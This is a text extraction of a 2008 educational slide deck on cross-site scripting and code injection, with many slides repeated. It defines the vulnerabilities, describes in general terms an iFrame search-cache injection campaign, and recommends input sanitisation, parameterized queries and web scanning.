Post on 02-Nov-2014
description
IntroductionRecent Activity
Prevention
XSS Vulnerabilities and Code Injection
Adam Curtis - ITU Security and Projects Office
5/1/2008 / SALT Meeting
Author, Another Presentation Title
IntroductionRecent Activity
Prevention
Outline
1 IntroductionWhat is XSS?Code Injection
2 Recent Activity
3 Prevention
Author, Another Presentation Title
IntroductionRecent Activity
Prevention
XSSCode Injection
Outline
1 IntroductionWhat is XSS?Code Injection
2 Recent Activity
3 Prevention
Author, Another Presentation Title
IntroductionRecent Activity
Prevention
XSSCode Injection
What is XSS?
XSS is the abbreviation for Cross-site ScriptingXSS is a security vulnerability found in web applicationsthat allows malicious users to inject code into web pages.The injected code is run with the same permissions thatthe client browser placed on the host website (hence theterm, “cross-site” - another’s code run on the host site)
Author, Another Presentation Title
IntroductionRecent Activity
Prevention
XSSCode Injection
What is XSS?
XSS is the abbreviation for Cross-site ScriptingXSS is a security vulnerability found in web applicationsthat allows malicious users to inject code into web pages.The injected code is run with the same permissions thatthe client browser placed on the host website (hence theterm, “cross-site” - another’s code run on the host site)
Author, Another Presentation Title
IntroductionRecent Activity
Prevention
XSSCode Injection
What is XSS?
XSS is the abbreviation for Cross-site ScriptingXSS is a security vulnerability found in web applicationsthat allows malicious users to inject code into web pages.The injected code is run with the same permissions thatthe client browser placed on the host website (hence theterm, “cross-site” - another’s code run on the host site)
Author, Another Presentation Title
IntroductionRecent Activity
Prevention
XSSCode Injection
Why is this bad?It bypasses security restrictions allowing for:
Session HijackingAccount HijackingMalware being silently download and installedAnd more!
Due to how easy it is to use the vulnerability, it can befound in major (trusted) sites
Search EnginesOnline StoresRecently... GMU!
Author, Another Presentation Title
IntroductionRecent Activity
Prevention
XSSCode Injection
Why is this bad?It bypasses security restrictions allowing for:
Session HijackingAccount HijackingMalware being silently download and installedAnd more!
Due to how easy it is to use the vulnerability, it can befound in major (trusted) sites
Search EnginesOnline StoresRecently... GMU!
Author, Another Presentation Title
IntroductionRecent Activity
Prevention
XSSCode Injection
Why is this bad?It bypasses security restrictions allowing for:
Session HijackingAccount HijackingMalware being silently download and installedAnd more!
Due to how easy it is to use the vulnerability, it can befound in major (trusted) sites
Search EnginesOnline StoresRecently... GMU!
Author, Another Presentation Title
IntroductionRecent Activity
Prevention
XSSCode Injection
Why is this bad?It bypasses security restrictions allowing for:
Session HijackingAccount HijackingMalware being silently download and installedAnd more!
Due to how easy it is to use the vulnerability, it can befound in major (trusted) sites
Search EnginesOnline StoresRecently... GMU!
Author, Another Presentation Title
IntroductionRecent Activity
Prevention
XSSCode Injection
Why is this bad?It bypasses security restrictions allowing for:
Session HijackingAccount HijackingMalware being silently download and installedAnd more!
Due to how easy it is to use the vulnerability, it can befound in major (trusted) sites
Search EnginesOnline StoresRecently... GMU!
Author, Another Presentation Title
IntroductionRecent Activity
Prevention
XSSCode Injection
Why is this bad?It bypasses security restrictions allowing for:
Session HijackingAccount HijackingMalware being silently download and installedAnd more!
Due to how easy it is to use the vulnerability, it can befound in major (trusted) sites
Search EnginesOnline StoresRecently... GMU!
Author, Another Presentation Title
IntroductionRecent Activity
Prevention
XSSCode Injection
Why is this bad?It bypasses security restrictions allowing for:
Session HijackingAccount HijackingMalware being silently download and installedAnd more!
Due to how easy it is to use the vulnerability, it can befound in major (trusted) sites
Search EnginesOnline StoresRecently... GMU!
Author, Another Presentation Title
IntroductionRecent Activity
Prevention
XSSCode Injection
Why is this bad?It bypasses security restrictions allowing for:
Session HijackingAccount HijackingMalware being silently download and installedAnd more!
Due to how easy it is to use the vulnerability, it can befound in major (trusted) sites
Search EnginesOnline StoresRecently... GMU!
Author, Another Presentation Title
IntroductionRecent Activity
Prevention
XSSCode Injection
Why is this bad?It bypasses security restrictions allowing for:
Session HijackingAccount HijackingMalware being silently download and installedAnd more!
Due to how easy it is to use the vulnerability, it can befound in major (trusted) sites
Search EnginesOnline StoresRecently... GMU!
Author, Another Presentation Title
IntroductionRecent Activity
Prevention
XSSCode Injection
Why is this bad?It bypasses security restrictions allowing for:
Session HijackingAccount HijackingMalware being silently download and installedAnd more!
Due to how easy it is to use the vulnerability, it can befound in major (trusted) sites
Search EnginesOnline StoresRecently... GMU!
Author, Another Presentation Title
IntroductionRecent Activity
Prevention
XSSCode Injection
Outline
1 IntroductionWhat is XSS?Code Injection
2 Recent Activity
3 Prevention
Author, Another Presentation Title
IntroductionRecent Activity
Prevention
XSSCode Injection
What is code injection?Wikipedia explains this well:
“Code injection is a computer bug that is caused byprocessing invalid data. Code injection can be used by anattacker to introduce (or “inject”) code into a computerprogram to change the course of execution.”
Code injection can be used in many different waysHTML/Script InjectionSQL InjectionPHP/ASP InjectionShell Injection
Now that we know a bit about XSS and Code Injection,let’s look at some recent activity regarding them.
Author, Another Presentation Title
IntroductionRecent Activity
Prevention
XSSCode Injection
What is code injection?Wikipedia explains this well:
“Code injection is a computer bug that is caused byprocessing invalid data. Code injection can be used by anattacker to introduce (or “inject”) code into a computerprogram to change the course of execution.”
Code injection can be used in many different waysHTML/Script InjectionSQL InjectionPHP/ASP InjectionShell Injection
Now that we know a bit about XSS and Code Injection,let’s look at some recent activity regarding them.
Author, Another Presentation Title
IntroductionRecent Activity
Prevention
XSSCode Injection
What is code injection?Wikipedia explains this well:
“Code injection is a computer bug that is caused byprocessing invalid data. Code injection can be used by anattacker to introduce (or “inject”) code into a computerprogram to change the course of execution.”
Code injection can be used in many different waysHTML/Script InjectionSQL InjectionPHP/ASP InjectionShell Injection
Now that we know a bit about XSS and Code Injection,let’s look at some recent activity regarding them.
Author, Another Presentation Title
IntroductionRecent Activity
Prevention
XSSCode Injection
What is code injection?Wikipedia explains this well:
“Code injection is a computer bug that is caused byprocessing invalid data. Code injection can be used by anattacker to introduce (or “inject”) code into a computerprogram to change the course of execution.”
Code injection can be used in many different waysHTML/Script InjectionSQL InjectionPHP/ASP InjectionShell Injection
Now that we know a bit about XSS and Code Injection,let’s look at some recent activity regarding them.
Author, Another Presentation Title
IntroductionRecent Activity
Prevention
XSSCode Injection
What is code injection?Wikipedia explains this well:
“Code injection is a computer bug that is caused byprocessing invalid data. Code injection can be used by anattacker to introduce (or “inject”) code into a computerprogram to change the course of execution.”
Code injection can be used in many different waysHTML/Script InjectionSQL InjectionPHP/ASP InjectionShell Injection
Now that we know a bit about XSS and Code Injection,let’s look at some recent activity regarding them.
Author, Another Presentation Title
IntroductionRecent Activity
Prevention
XSSCode Injection
What is code injection?Wikipedia explains this well:
“Code injection is a computer bug that is caused byprocessing invalid data. Code injection can be used by anattacker to introduce (or “inject”) code into a computerprogram to change the course of execution.”
Code injection can be used in many different waysHTML/Script InjectionSQL InjectionPHP/ASP InjectionShell Injection
Now that we know a bit about XSS and Code Injection,let’s look at some recent activity regarding them.
Author, Another Presentation Title
IntroductionRecent Activity
Prevention
XSSCode Injection
What is code injection?Wikipedia explains this well:
“Code injection is a computer bug that is caused byprocessing invalid data. Code injection can be used by anattacker to introduce (or “inject”) code into a computerprogram to change the course of execution.”
Code injection can be used in many different waysHTML/Script InjectionSQL InjectionPHP/ASP InjectionShell Injection
Now that we know a bit about XSS and Code Injection,let’s look at some recent activity regarding them.
Author, Another Presentation Title
IntroductionRecent Activity
Prevention
XSSCode Injection
What is code injection?Wikipedia explains this well:
“Code injection is a computer bug that is caused byprocessing invalid data. Code injection can be used by anattacker to introduce (or “inject”) code into a computerprogram to change the course of execution.”
Code injection can be used in many different waysHTML/Script InjectionSQL InjectionPHP/ASP InjectionShell Injection
Now that we know a bit about XSS and Code Injection,let’s look at some recent activity regarding them.
Author, Another Presentation Title
IntroductionRecent Activity
Prevention
Outline
1 IntroductionWhat is XSS?Code Injection
2 Recent Activity
3 Prevention
Author, Another Presentation Title
IntroductionRecent Activity
Prevention
Recent ActivityStarting at the beginning of March, an exploit wasdiscovered moving across many of CNet’s search enginesand then reaching many other popular websites. Thisexploit deals with Search Engine Optimization and withcached webpages.Basically, the attackers submitted search engine querieswith popular sites with an iFrame tag injected next to thekeyword. This increases the page ranking of the site andembeds the iFrame tag in cached pages. When the pageis hit, the content from the iFrame loads without the usernoticing.The iFrame redirects to the attacker’s website where thereis malicious Javascript and a download for a fake codec
Author, Another Presentation Title
IntroductionRecent Activity
Prevention
Recent ActivityStarting at the beginning of March, an exploit wasdiscovered moving across many of CNet’s search enginesand then reaching many other popular websites. Thisexploit deals with Search Engine Optimization and withcached webpages.Basically, the attackers submitted search engine querieswith popular sites with an iFrame tag injected next to thekeyword. This increases the page ranking of the site andembeds the iFrame tag in cached pages. When the pageis hit, the content from the iFrame loads without the usernoticing.The iFrame redirects to the attacker’s website where thereis malicious Javascript and a download for a fake codec
Author, Another Presentation Title
IntroductionRecent Activity
Prevention
Recent ActivityStarting at the beginning of March, an exploit wasdiscovered moving across many of CNet’s search enginesand then reaching many other popular websites. Thisexploit deals with Search Engine Optimization and withcached webpages.Basically, the attackers submitted search engine querieswith popular sites with an iFrame tag injected next to thekeyword. This increases the page ranking of the site andembeds the iFrame tag in cached pages. When the pageis hit, the content from the iFrame loads without the usernoticing.The iFrame redirects to the attacker’s website where thereis malicious Javascript and a download for a fake codec
Author, Another Presentation Title
IntroductionRecent Activity
Prevention
Outline
1 IntroductionWhat is XSS?Code Injection
2 Recent Activity
3 Prevention
Author, Another Presentation Title
IntroductionRecent Activity
Prevention
www.xkcd.com
Author, Another Presentation Title
IntroductionRecent Activity
Prevention
PreventionPrevention of such vulnerabilities can be avoided by inputsanitation.In SQL, this would mean using parameterized statements.In many input fields, this means dropping quotes, strippingHTML tags, etc. when not needed.
Author, Another Presentation Title
IntroductionRecent Activity
Prevention
PreventionPrevention of such vulnerabilities can be avoided by inputsanitation.In SQL, this would mean using parameterized statements.In many input fields, this means dropping quotes, strippingHTML tags, etc. when not needed.
Author, Another Presentation Title
IntroductionRecent Activity
Prevention
PreventionPrevention of such vulnerabilities can be avoided by inputsanitation.In SQL, this would mean using parameterized statements.In many input fields, this means dropping quotes, strippingHTML tags, etc. when not needed.
Author, Another Presentation Title
IntroductionRecent Activity
Prevention
ScanningAn extra method for prevention would be to run webapplication scanning software on your webpages.An excellent scanning tool is Paros, a program written inJava, available at www.parosproxiy.org
Author, Another Presentation Title
IntroductionRecent Activity
Prevention
ScanningAn extra method for prevention would be to run webapplication scanning software on your webpages.An excellent scanning tool is Paros, a program written inJava, available at www.parosproxiy.org
Author, Another Presentation Title